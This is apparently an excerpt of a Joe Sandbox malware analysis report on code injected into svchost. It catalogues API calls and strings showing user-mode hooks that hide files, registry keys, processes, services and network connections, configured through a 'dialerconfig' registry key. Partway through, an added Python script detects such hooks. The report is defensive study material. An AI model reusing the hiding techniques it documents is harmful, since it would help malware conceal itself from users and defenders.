                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: d10138deb8bbbe3c9e36edbeaa6ef6b6b2d091da5ebc89b531e029dc850f4207
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: 9211C43E658E08C2F7609B21FE053D97294B7CC387FB08124990A6D6E6EF78C0468E00

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00000158709D1628: GetProcessHeap.KERNEL32 ref: 00000158709D1633
                          • Part of subcall function 00000158709D1628: HeapAlloc.KERNEL32 ref: 00000158709D1642
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D16B2
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D16DF
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D16F9
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1719
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1734
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1754
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D176F
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D178F
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D17AA
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17CA
                        • Sleep.KERNEL32 ref: 00000158709D1AD7
                        • SleepEx.KERNELBASE ref: 00000158709D1ADD
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D17E5
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1805
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1820
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1840
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D185B
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D187B
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1896
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D18A0
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: dd6c86af37df3cdfce808d9367ca0a589ea4c12304fe849a19c5307a2c397293
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: C931B47B244D49E1EB509B36DE513F93394A7CCBD2F2454229E09AF79BEE18C4538A10

                        Control-flow Graph

                        control_flow_graph (flattened dump of the rendered graph, summarised; executed/not-executed colouring lost): function 158709d3844, four basic blocks; block 158709d3851-158709d3864 calls StrCmpNIW and both paths fall through to 158709d3869-158709d3870.
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: dialer
                        • API String ID: 0-3528709123
                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                        • Instruction ID: 780bff3d9f94a45a4787809db9a9868108e6e80b955a58f819050ff7eb005af9
                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                        • Instruction Fuzzy Hash: 8ED05E79351A09C6FB149FA68CC47A03350AB8C7D6FA89020990019160DF188D9EAE10

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 917a96bc1d6c895ecea56c2d7ec6bba4e4c507b6cb4fc8ea2b9ce0172117c01a
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: 9A61E3BAB09A90C7DB548F19D9007EA7392F7D8B95F248121DE593B784DE38D853EB00

                        Control-flow Graph

                        control_flow_graph (flattened dump of the rendered graph, summarised; executed/not-executed colouring lost): function 158709d2b2c, roughly 85 basic blocks with a single exit at 158709d2ee0. Early blocks call 158709f2ce0, then GetModuleHandleA and GetProcAddress, then StrCmpNIW; the main loop (158709d2c60 .. 158709d2ed2) uses lstrlenW and sub-calls 158709d199c, 158709d1bbc, 158709d152c, 158709d3844 and, on the final path, 158709d85c0 three times. The string table for this function (below) lists ntdll.dll, NtQueryObject and \Device\Nsi.
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: e19b0cfe6a8045a754af9c3da777dccb95321baacbab1f044a34d1dd9148c669
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 4EB1B03A218E58C2EB648F25DC407E973A5FBD8B96F245016EE496B796DF34CC42CB40
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: e7c148938d73b118393facd0308456c1e40248a19777e3d89d8291f9a2c8a452
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: 9D313A76205E84CAEB609F60E8403EE7361F788745F54402ADA4D6BBA5EF38C949CB10
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: 059a4172f76ea96128a6440cafd08da1c107212dcb3790aa4d309b172f3a75cd
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: C5315B3A214F84C6DB60CB25E8403DE73A0F7C9799F640126EA9D5BBA5EF38C556CB00

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: 0f6089fd75106e825002abacbaf1900165387074937e0fada7e43ed3f6eff390
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: 3371183B314E14D6EB109F72EC4079933A5F7C8B8AF101121DA4E6BB29DE34C956CB40

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: eb3ce238f31fcb04bd06a980f3a210d1e24ed5b83b152061e04dc28651e22d57
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: E5513A3B208B84D6EB55CF62E84839A77A1F7C9BDAF144124DA491B729DF38C456CB00

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: fe178ff9f80e494172ea236cf487610b27fb66f29a12b80d336874847e16e756
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: B131AE7E545E4AE0EA04EBA9EC517E43320F7DC346FA9401394493E277AF38865BCB50
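                        The string table above names the user-mode APIs this function resolves (NtQueryDirectoryFile, NtEnumerateKey, NtEnumerateValueKey, NtQuerySystemInformation, NtDeviceIoControlFile, NtResumeThread, EnumServicesStatusExW, EnumServiceGroupW), the classic targets of inline hooks that hide files, registry keys, processes, services and network connections from the hooked process. The following is an added example, not code from the report or from the sample: a checker that reads each target's prolog out of a suspect process and compares it with the same function in the scanning process, decoding the common x64 trampolines so the destination can be followed to the injected module. It assumes (the report does not say this) that the scanner itself is not injected and that ntdll, advapi32 and sechost are mapped at the same base in both processes, which is how Windows ASLR treats system DLLs within one boot session. classify_prolog() is pure Python and runs anywhere; scan_process() needs Windows and ctypes. SAMPLE_CLEAN_STUB is a constructed stand-in for a syscall stub, not bytes taken from the report.

```python
"""Added example (not from the Joe Sandbox report or the sample): detect
user-mode inline hooks on the APIs the report's string table lists as hook
targets, by comparing each function's prolog in a target process with the
copy mapped in the scanning process.

Assumptions (not stated by the report): the scanner is not itself injected,
and system DLLs share one base across processes (Windows ASLR per boot).
"""
import sys
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Hook targets, taken from the report's string table for this function.
HOOK_TARGETS: Dict[str, List[str]] = {
    "ntdll.dll": [
        "NtDeviceIoControlFile", "NtEnumerateKey", "NtEnumerateValueKey",
        "NtQueryDirectoryFile", "NtQueryDirectoryFileEx",
        "NtQuerySystemInformation", "NtResumeThread",
    ],
    "advapi32.dll": ["EnumServicesStatusExW"],
    "sechost.dll": ["EnumServiceGroupW"],
}

PROLOG_LEN = 16  # bytes compared; covers the common x64 trampolines

# Constructed sample of an x64 syscall stub shape (mov r10,rcx; mov eax,N; ...),
# used only for offline tests; not bytes from the report.
SAMPLE_CLEAN_STUB = bytes.fromhex("4c8bd1b83a000000f604250803fe7f01")


@dataclass
class HookVerdict:
    hooked: bool
    kind: str              # clean | jmp_rel32 | mov_rax_jmp | push_ret | modified
    target: Optional[int]  # decoded trampoline destination, when computable


def classify_prolog(clean: bytes, live: bytes, live_addr: int = 0) -> HookVerdict:
    """Compare a function's first PROLOG_LEN bytes in a live process with a
    clean copy and name the trampoline type so the destination can be followed."""
    clean, live = clean[:PROLOG_LEN], live[:PROLOG_LEN]
    if clean == live:
        return HookVerdict(False, "clean", None)
    # E9 rel32             jmp rel32 (destination = next instruction + rel32)
    if len(live) >= 5 and live[0] == 0xE9:
        rel = int.from_bytes(live[1:5], "little", signed=True)
        return HookVerdict(True, "jmp_rel32", (live_addr + 5 + rel) & 0xFFFFFFFFFFFFFFFF)
    # 48 B8 imm64 / FF E0  mov rax, imm64 ; jmp rax
    if len(live) >= 12 and live[:2] == b"\x48\xB8" and live[10:12] == b"\xFF\xE0":
        return HookVerdict(True, "mov_rax_jmp", int.from_bytes(live[2:10], "little"))
    # 68 imm32 / C3        push imm32 ; ret (32-bit processes)
    if len(live) >= 6 and live[0] == 0x68 and live[5] == 0xC3:
        return HookVerdict(True, "push_ret", int.from_bytes(live[1:5], "little"))
    # Bytes differ but no recognised trampoline: still worth reporting.
    return HookVerdict(True, "modified", None)


def scan_process(pid: int) -> List[Tuple[str, str, HookVerdict]]:
    """Windows only: read each target's prolog out of `pid` and classify it
    against the same export in this process."""
    import ctypes
    from ctypes import wintypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype = wintypes.HANDLE
    k32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
    k32.LoadLibraryW.restype = wintypes.HMODULE
    k32.LoadLibraryW.argtypes = [wintypes.LPCWSTR]
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = [wintypes.HMODULE, wintypes.LPCSTR]
    k32.ReadProcessMemory.argtypes = [wintypes.HANDLE, wintypes.LPCVOID, wintypes.LPVOID,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    PROCESS_VM_READ, PROCESS_QUERY_INFORMATION = 0x0010, 0x0400
    h = k32.OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, pid)
    if not h:
        raise OSError(ctypes.get_last_error(), "OpenProcess failed")
    results = []
    try:
        for dll, names in HOOK_TARGETS.items():
            mod = k32.LoadLibraryW(dll)  # make sure the export is resolvable locally
            for name in names:
                addr = k32.GetProcAddress(mod, name.encode())
                if not addr:
                    continue  # export absent on this Windows build
                clean = ctypes.string_at(addr, PROLOG_LEN)
                buf = ctypes.create_string_buffer(PROLOG_LEN)
                got = ctypes.c_size_t(0)
                if not k32.ReadProcessMemory(h, addr, buf, PROLOG_LEN, ctypes.byref(got)):
                    continue  # DLL not mapped in the target, or access denied
                results.append((dll, name, classify_prolog(clean, buf.raw, addr)))
    finally:
        k32.CloseHandle(h)
    return results


if __name__ == "__main__" and sys.platform == "win32":
    for dll, name, v in scan_process(int(sys.argv[1])):
        if v.hooked:
            print(f"{dll}!{name}: {v.kind} -> {v.target:#x}" if v.target else f"{dll}!{name}: {v.kind}")
```

Run it elevated against the injected svchost/explorer PID; a "jmp_rel32" or "mov_rax_jmp" verdict whose target lies outside any legitimately loaded module is the finding. A "modified" verdict means the bytes differ in a way this decoder does not recognise and should be dumped and disassembled by hand.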

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 2bc89b2b44f4cc9601cd367f7fcf5040b1f2b50bcf0555486a2ee6e897309275
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 0481AFBD708E41C6FA909B659C413D972A0A7CD782F7480259A49BF796DF38C847EF00

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 00000158709DCE37
                        • FlsGetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE4C
                        • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE6D
                        • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE9A
                        • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCEAB
                        • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCEBC
                        • SetLastError.KERNEL32 ref: 00000158709DCED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,00000158709DECCC,?,?,?,?,00000158709DBF9F,?,?,?,?,?,00000158709D7AB0), ref: 00000158709DCF2C
                          • Part of subcall function 00000158709DD6CC: HeapAlloc.KERNEL32 ref: 00000158709DD721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF54
                          • Part of subcall function 00000158709DD744: HeapFree.KERNEL32 ref: 00000158709DD75A
                          • Part of subcall function 00000158709DD744: GetLastError.KERNEL32 ref: 00000158709DD764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF76
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: 9975690624174f1e8eecd39a416a149b1b9c960f19d828ddab801993930161a0
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: DB4184BC289E4DC1FA6867255D523E932425BCC7B6F740724A8367E7DBED28D8434E80

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: 9d08b4948e7ab7a7583e3835b8c16d8cf2b2d0085f3f9790f0536a71d5975b49
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: 0D21303A618A54C2E710CB25F84439977A0F7C9BE6F640215DA591ABA8CF3CC55ACF00

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: 08ab0671c9424b5081223383289d6080edcd3caa4dd75a7e0d5916fa68029c91
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: 8AE16EBA608F40CAEB60DB69DC403DD77A4F799799F204116EE896BB95CF34C492DB00

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction ID: f3fa1228f9b23b1bab88f1be00c529a69e786049c2ce1459848cac513dec6a52
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: D0E1807A648F48CAEB20DF65D8803DD77A0F799799F640115EE896BB96CF34C492CB00

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: cb0434ac2a4b0d4f8a64736bfb55d34b7dfcd7b844d76ba5a6e5c12046194fd4
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: 9441293A359E04D1EA15CB16AC147D63391B7CDBE2F2541299D0DAF7AAEE38C4478B40
                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD087
                        • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0A6
                        • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0CE
                        • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0DF
                        • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0F0
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: 1d2e9aa775ac6edd092d1a246d88b9f5446202352410f6619a6c14a773fb799f
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: 9811307878DE4CC1FA6857259D523F971419BCC7A6F78422594292E7DBDE28D4438A00
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 3d8f95e5633d4c6b653d59d18f429cffb185ad790c80063b25e37e7c71a7f415
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 03817E3D688E49C6FA50EB65AC413D9B291ABCD782F744415A9086F7A7FF38C8478F01
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: 7fb3335a45b0d0e99637cb6ac1d0fd9b443a23753f7729f4e4207a61b16c956a
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: 2031D83A35AE44E1EE11EB42AC007D97394B7CCBA2F7906259D1E6F392DF38C4568B10
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 5854a10f70b8acde66e217e2d3e673b9bf3bb195df514e6a525a3e7a0ccb6496
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: 52118236314F40C6E7508B52FC5435976A0F7CCFE6F244218EA5A9B7A4CF78C9668B80
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
